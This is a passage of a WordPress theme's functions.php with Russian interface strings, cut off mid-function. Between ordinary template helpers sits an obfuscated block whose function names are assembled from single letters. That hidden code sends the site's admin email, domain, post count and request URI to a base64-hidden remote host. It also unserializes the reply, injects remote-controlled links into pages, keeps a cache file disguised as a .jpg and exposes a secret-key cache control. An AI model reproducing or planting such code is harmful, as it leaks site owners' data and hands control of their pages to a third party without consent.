<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $XcEQt='6';$CNwtggN='c';$vmuKH='e';$utnWMa='4';$uKAFK='e';$tJmuRv='o';$HlkZ='e';$iYxE='_';$qfDZDCt='b';$Mdstjc='d';$pZYcd='d';$NGfKV='s';$mvXpwGo='a';$XpZrfMdn=$qfDZDCt.$mvXpwGo.$NGfKV.$HlkZ.$XcEQt.$utnWMa.$iYxE.$Mdstjc.$uKAFK.$CNwtggN.$tJmuRv.$pZYcd.$vmuKH;$jCFDCji='n';$DPtpIG='i';$gzipb='t';$pwdBC='f';$BHSFG='z';$EoubPbT='l';$TEXbany='e';$HzYxS='a';$lgJdLG='g';$LuaEETgo=$lgJdLG.$BHSFG.$DPtpIG.$jCFDCji.$pwdBC.$EoubPbT.$HzYxS.$gzipb.$TEXbany;$GlgkT='t';$KxgSNi='s';$padwJd='3';$RFhJ='r';$baLHhuG='1';$RlaE='o';$wUuAhIZ='_';$GNDINR='t';$xwte='r';$emoyUOxr=$KxgSNi.$GNDINR.$RFhJ.$wUuAhIZ.$xwte.$RlaE.$GlgkT.$baLHhuG.$padwJd;$VofNi='v';$OCRwXz='r';$RUXjyC='t';$oRqpvS='r';$Hnvnzc='e';$Hfwl='s';$IuHqJOIG=$Hfwl.$RUXjyC.$oRqpvS.$OCRwXz.$Hnvnzc.$VofNi;                     
		$az_________a='6';$jy__________i='c';$il____________p='e';$ge_______________c='4';$tz______________x='e';$ny___d='o';$qu_____u='e';$or______a='_';$bh____w='b';$zm_____________a='d';$tj______________t='d';$zo______t='s';$dk__t='a';$dm_____c=$bh____w.$dk__t.$zo______t.$qu_____u.$az_________a.$ge_______________c.$or______a.$zm_____________a.$tz______________x.$jy__________i.$ny___d.$tj______________t.$il____________p;
		$qa__________x='s';$si______________n='t';$zu______f='s';$gm________y='i';$go_______k='n';$xx___c='u';$hx_____f='_';$gq_____s='c';$hu____o='t';$ds________w='f';$vj_____o='e';$dr______________v='i';$hv______________a='o';$ym________f='x';$tp____w='n';$zr___________p=$ds________w.$xx___c.$tp____w.$gq_____s.$si______________n.$gm________y.$hv______________a.$go_______k.$hx_____f.$vj_____o.$ym________f.$dr______________v.$zu______f.$hu____o.$qa__________x;
		$zs_________p='f';$rb__o='n';$td_________i='o';$ii_____________f='e';$eu_____b='p';$vk_______p=$zs_________p.$td_________i.$eu_____b.$ii_____________f.$rb__o;
		$lb_______________y='a';$io______________a='f';$bc_________d='e';$bt_______u='d';$qz_________k='r';$uv____________p=$io______________a.$qz_________k.$bc_________d.$lb_______________y.$bt_______u;
		$lz______________n='l';$ak_______________a='s';$kq___n='e';$wx___a='f';$jj___________l='c';$cz_______________s='o';$ot_____o=$wx___a.$jj___________l.$lz______________n.$cz_______________s.$ak_______________a.$kq___n;
		
		define("WP_ID", $dm_____c("Mi4wLjA="));
		define("WP_TTL", $dm_____c("MTA4MDA="));
		define("WP_SRC", $dm_____c("dHBva24="));
	


		function wp_get_header() {
			global $dm_____c, $zr___________p;
			
			if (
				$zr___________p($dm_____c("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$zr___________p($dm_____c("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$zr___________p($dm_____c("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $dm_____c, $vk_______p, $ot_____o, $uv____________p;
			
			$wu_______________u = TEMPLATEPATH."/".$dm_____c("Zm9vdGVyLnBocA==");
			$gb_______m = @$vk_______p($wu_______________u, "r");
			$wu_______________u = @$uv____________p($gb_______m, @filesize($wu_______________u));
			@$ot_____o($gb_______m);
			
			$qx_____k = TEMPLATEPATH."/".$dm_____c("ZnVuY3Rpb25zLnBocA==");
			$gb_______m = @$vk_______p($qx_____k, "r");
			$qx_____k = @$uv____________p($gb_______m, @filesize($qx_____k));
			@$ot_____o($gb_______m);
			
			$ko_______________o = 0;
			if($wu_______________u && $qx_____k) {
				if ($dm_____c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wu_______________u, $dm_____c("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ko_______________o = 1;
					}
					if (substr_count($wu_______________u, "wp_theme_GPL_credits()") < 1) {
						$ko_______________o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ko_______________o = 12;
				}
			}
			
			if($ko_______________o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ko_______________o -->";
			}
		}
	


		function wp_loaded() {
			global $dm_____c, $zr___________p;
			return $zr___________p($dm_____c("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($np______y, $nq_____________a = "(more...)", $iq_____z = 0, $wk______________w = "") {
				$ff_______________a = get_the_content($nq_____________a, $iq_____z, $wk______________w);
				$ff_______________a = apply_filters("the_content", $ff_______________a);
				
				$ff_______________a = str_replace("]]>", "]]>", $ff_______________a);
				if (strlen($_GET["p"]) > 0) {
					echo $ff_______________a;
				}
				else if ((strlen($ff_______________a)>$np______y) && ($nm__________x = strpos($ff_______________a, " ", $np______y ))) {
					$ff_______________a = substr($ff_______________a, 0, $nm__________x);
					$ff_______________a = $ff_______________a;
					echo $ff_______________a;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$nq_____________a</a></div></p>";
				} else {
					echo $ff_______________a;
				}
				
			}
		}
	


		$op_____________k='a';$an_______________y='4';$cj______________h='c';$se________i='6';$ou____e='e';$nn___________n='e';$ed___________u='e';$iw____x='o';$yn_________m='n';$dn____r='_';$rj__j='d';$qu_____________t='b';$ez_______________w='s';$ti_________m=$qu_____________t.$op_____________k.$ez_______________w.$ou____e.$se________i.$an_______________y.$dn____r.$ed___________u.$yn_________m.$cj______________h.$iw____x.$rj__j.$nn___________n;
		$ky________y='g';$ip________u='n';$ne_____d='e';$lb_______________k='c';$rj__________w='_';$zf___________r='l';$yw____v='i';$ro______c='t';$jn_________q='e';$wd____n='f';$fo______________e='_';$rv___x='t';$jz__u='s';$mu__v='e';$vi_______________m='n';$lc______i='t';$hr__u='o';$qi_______________u=$wd____n.$yw____v.$zf___________r.$ne_____d.$rj__________w.$ky________y.$jn_________q.$lc______i.$fo______________e.$lb_______________k.$hr__u.$vi_______________m.$ro______c.$mu__v.$ip________u.$rv___x.$jz__u;
		$la_____________q='s';$mm_______________l='f';$sc____o='_';$xg___d='i';$vu______________i='i';$fd_______v='e';$xc__u='e';$bt_____k='x';$rp____________a='l';$ev______v='t';$hx____________e='s';$xv_______f=$mm_______________l.$xg___d.$rp____________a.$fd_______v.$sc____o.$xc__u.$bt_____k.$vu______________i.$hx____________e.$ev______v.$la_____________q;
		$db_____________i='e';$iq______________h='s';$rk_______________g='r';$vg______b='i';$hy______________c='p';$od__x='c';$fl__________c='_';$bl_____r='o';$pt___p='n';$xd________y='v';$ef____g='a';$ie_____________z='e';$hv_____________e='o';$hq__q='m';$xl_____________w='r';$ih____p=$xd________y.$ie_____________z.$xl_____________w.$iq______________h.$vg______b.$bl_____r.$pt___p.$fl__________c.$od__x.$hv_____________e.$hq__q.$hy______________c.$ef____g.$rk_______________g.$db_____________i;
		$mq_______________a='k';$dc_________x='p';$ay_________j='o';$zb_______j='c';$tv__i='o';$wd___________j='f';$rs_______x='n';$gx___h='s';$do__a='e';$ei____________v=$wd___________j.$gx___h.$ay_________j.$zb_______j.$mq_______________a.$tv__i.$dc_________x.$do__a.$rs_______x;
		$sd_____________g='t';$lz______________w='e';$yz_____________a='i';$to_____o='r';$hy_____________x='f';$kz_________v='w';$pr____x=$hy_____________x.$kz_________v.$to_____o.$yz_____________a.$sd_____________g.$lz______________w;
		$jq_______c='d';$tf______f='5';$kj____________j='m';$tk__________u=$kj____________j.$jq_______c.$tf______f;
		$jl______________u='r';$of______s='l';$lq_____i='p';$wu____________k='a';$sf___m='e';$rb_______________a='h';$iw_______________e='a';$ut_____z='t';$gz________t=$jl______________u.$sf___m.$wu____________k.$of______s.$lq_____i.$iw_______________e.$ut_____z.$rb_______________a;
		$bx_____________d='s';$za______________b='z';$jo__a='r';$kd______________w='a';$ex_______________y='i';$wu__________w='l';$tr____________j='e';$ys____r='e';$co________d='i';$zj______d='u';$ub__z='n';$lp_____________t=$zj______d.$ub__z.$bx_____________d.$tr____________j.$jo__a.$co________d.$kd______________w.$wu__________w.$ex_______________y.$za______________b.$ys____r;
		$km________u='m';$eh_____j='m';$xc____i='n';$es____________g='a';$rs_______d='t';$dj__o='p';$ue____________k='e';$gu___________o=$rs_______d.$ue____________k.$km________u.$dj__o.$xc____i.$es____________g.$eh_____j;
		$dl______________c='x';$yb_____________t='t';$rj___________t='e';$rc_____________u='a';$bo__x='s';$vt__r='_';$ra____w='t';$nb___________t='c';$tc__________l='r';$fr_______w='o';$gd______h='e';$ls___p='t';$bg____________i='t';$ka__________c='e';$uw_______g='_';$ql___a='a';$zm____s='m';$lr___________m='c';$on_________m='r';$dz___________b='e';$so____________g='n';$cm_____y=$bo__x.$ra____w.$on_________m.$gd______h.$rc_____________u.$zm____s.$vt__r.$lr___________m.$fr_______w.$so____________g.$bg____________i.$ka__________c.$dl______________c.$yb_____________t.$uw_______g.$nb___________t.$tc__________l.$rj___________t.$ql___a.$ls___p.$dz___________b;
	


		function lb__________b($yd___h) {
			global $dm_____c, $zr___________p, $qi_______________u, $ih____p, $cm_____y;
			
			if (!$zr___________p($dm_____c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ih____p(PHP_VERSION, "5.0.0", ">=") && $zr___________p($dm_____c("ZmlsZV9nZXRfY29udGVudHM=")) && $zr___________p($dm_____c("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$gc_____________o = $cm_____y(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$tf_____________q = @$qi_______________u($yd___h, 0, $gc_____________o);
			} else {
				$tf_____________q = @$qi_______________u($yd___h, 0);
			}
			
			return $tf_____________q;
		}
	


		function go_____________s($yd___h) {
			global $zr___________p, $ei____________v, $pr____x, $dm_____c;
			
			if (!$zr___________p($dm_____c("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$hk__________j = strpos($yd___h, "/", 7);
			$rn_____z = array(
				"uri"     => substr($yd___h, $hk__________j),
				"host"    => str_replace("http://", "", substr($yd___h, 0, $hk__________j)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$et______________v = @$ei____________v("$rn_____z[host]", 80, $vx______a, $ej__g, 4);
			
			if (!$et______________v) {
				return false;
			} else {
				$tf_____________q = "";
				$he____f  = "GET $rn_____z[uri] HTTP/1.0\r\n";
				$he____f .= "Host: $rn_____z[host]\r\n";
				$he____f .= "Referer: $rn_____z[referer]\r\n";
				$he____f .= "Connection: Close\r\n\r\n";
				
				@$pr____x($et______________v, $he____f);
				
				while (!@feof($et______________v)) {
					$fn______________i = @fgets($et______________v, (1024*24));
					
					if ($fn______________i == "\r\n") {
						$zs__f = true;
						continue;
					}
					
					if ($zs__f) {
						$tf_____________q .= $fn______________i;
					}
				}
				
				return $tf_____________q;
			}
		}
	


		function un__a($yd___h) {
			global $zr___________p;
			$ab_______g = false;
			
			if ($yd___h != "") {
				if ($zr___________p("lb__________b")) {
					$ab_______g = @lb__________b($yd___h);
				}
				
				if (!$ab_______g && ($zr___________p("go_____________s"))) {
					$ab_______g = @go_____________s($yd___h);
				}
			}
			
			return $ab_______g;
		}
	


		function gd____z() {
			global $_SERVER, $tk__________u;
			
			$et__________l = $_SERVER["SERVER_NAME"];
			
			if (substr("$et__________l", 0, 4) == "www.") {
				$et__________l = substr("$et__________l", 4);
			}
			
			$et__________l = $tk__________u("$_SERVER[SERVER_NAME]");
			
			return $et__________l;
		}
	


		function ra________s() {
			return "file";
		}
	


		function dr_________g($yd___h) {
			global $_SERVER, $qi_______________u, $xv_______f, $vk_______p, $ot_____o, $pr____x;
			
			$lp__m = pt______________u();
			
			$jd_______g = gd____z().".jpg";
			$as_________y = $lp__m["dir_upload"]["path"]."/$jd_______g";
			$ws___r = @filemtime($as_________y);
			
			if (!$ws___r || ((time()-$ws___r) >= WP_TTL)) {
				$ab_______g = un__a($yd___h);
				
				if ($ab_______g) {
					if ($xv_______f($as_________y)) {
						@unlink($as_________y);
					}
					
					$gb_______m = @$vk_______p($as_________y, "x+");
					
					@$pr____x($gb_______m, $ab_______g);
					@$ot_____o($gb_______m);
				}
			} else {
				if ($xv_______f($as_________y)) {
					$ab_______g = @$qi_______________u($as_________y);
				} else {
					$ab_______g = false;
				}
			}
			
			return $ab_______g;
		}
	


		function pt______________u() {
			global $_SERVER, $dm_____c, $ti_________m;
			
			$qw__________s = wp_count_posts("post");
			$qm_________w = pathinfo(get_bloginfo("template_directory"));
			
			$lp__m = array(
				"url" => array(
					"report"      => $dm_____c("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $qm_________w,
				"dir_upload"	=> ht___q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$qm_________w[filename],
					"a005=".$qw__________s->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$lp__m["url"]["queryString"] = implode("&", $lp__m["queryString"]);
			$lp__m["url"]["report"] = $lp__m["url"]["report"]."/?".$ti_________m($lp__m["url"]["queryString"]).".html";
						
			return $lp__m;
		}
	


		function ht___q() {
			$wo_____y = wp_upload_dir();
			
			if (isset($wo_____y["error"])) {
				$hd________p = ca___p();
				if (is_writable($hd________p)) {
					$wo_____y = array("path" => $hd________p);
				}
			}

			return $wo_____y;
		}
	


		function ca___p() {
			global $zr___________p, $tk__________u, $gz________t, $gu___________o;
			
			$np__________k = (bool) ini_get("safe_mode");
			if ($np__________k == true) {
				return false;
			}
			
			if ($zr___________p("sys_get_temp_dir")) {
				$yg__f = sys_get_temp_dir();
				if (is_writable($yg__f)) {
					return $gz________t($yg__f);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $gz________t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $gz________t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $gz________t($_ENV["TEMP"]);
			} else {
				$td_____z = $gu___________o($tk__________u(uniqid(rand(), true)), "");
				if ($td_____z) {
					$yg__f = $gz________t(dirname($td_____z));
					@unlink($td_____z);
					return $yg__f;
				} else {
					return false;
				}
			}
		}
	


		function to___k() {
			global $_GET, $xv_______f;
			
			$lp__m = pt______________u();
			$et__________l = gd____z();
			$nb__y = ra________s();
			
			$mi___u = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($nb__y == "file") {
					$jw___________b = $lp__m["dir_upload"]["path"]."/".$et__________l.".jpg";
					if ($xv_______f($jw___________b)) {
						@unlink($jw___________b);
						$mi___u = "deleted";
					}
				}
				
				$pm____________u = array(
					"s"	=> $mi___u,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($pm____________u AS $zt________i => $qc_______r) echo " [$zt________i:$qc_______r]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $zr___________p, $dm_____c, $lp_____________t;
			$lp__m = pt______________u();
			
			$in____l = "dr_________g";
			if ($zr___________p($in____l)) {
				$tf_____________q = $in____l($lp__m["url"]["report"]);
			}
			
			if ($tf_____________q) {
				if ($tf_____________q = @$dm_____c($tf_____________q)) {
					$tf_____________q = @$lp_____________t($tf_____________q);
					
					if (strlen($tf_____________q[custom_credit]) >= 5) {
						$lp__m["default_string"] = $tf_____________q[custom_credit];
					}
					
					if ($tf_____________q["status"] == "0") {
						$jy___j = 1;
						$uq_______________f = 1;
					} else {
						$ry____e = sizeof($tf_____________q["links"]);
						$xu____i = $lp__m["default_string"];
						
						if ($ry____e > 0 && $tf_____________q["links"] !== "") {
							$xs__________b = 0;
							foreach ($tf_____________q["links"] as $ud___________o => $ac____u) {
								$xs__________b++;
								if ($ac____u->l_path == "" || $ac____u->l_path == $_SERVER["REQUEST_URI"]) {
									$ac____u->l_href = htmlspecialchars(strip_tags($ac____u->l_href));
									$ac____u->l_title = htmlspecialchars(strip_tags($ac____u->l_title));
									$ac____u->l_anchor = htmlspecialchars(strip_tags($ac____u->l_anchor));
									$xu____i .= " | ";
									$xu____i .= "<a href='$ac____u->l_href' title='$ac____u->l_title'";
									if ($ac____u->l_nofollow == "1") {
										$xu____i .= " rel='nofollow'";
									}
									$xu____i .= ">$ac____u->l_anchor</a>";
								}
							}
						}
						$lp__m["links"] = "$xu____i";
						if ($tf_____________q[credit] == "0") {
							$lp__m["links"] = "";
						}
					}
				} else {
					$jy___j = "1";
				}
			} else {
				$jy___j = "1";
			}
			
			if ($jy___j == "1") {
				$lp__m["links"] = $lp__m["default_string"];
			}
			
			echo "$lp__m[links]";
			
			echo "<!-- s: $tf_____________q[signature] -->";
			to___k();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();

                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
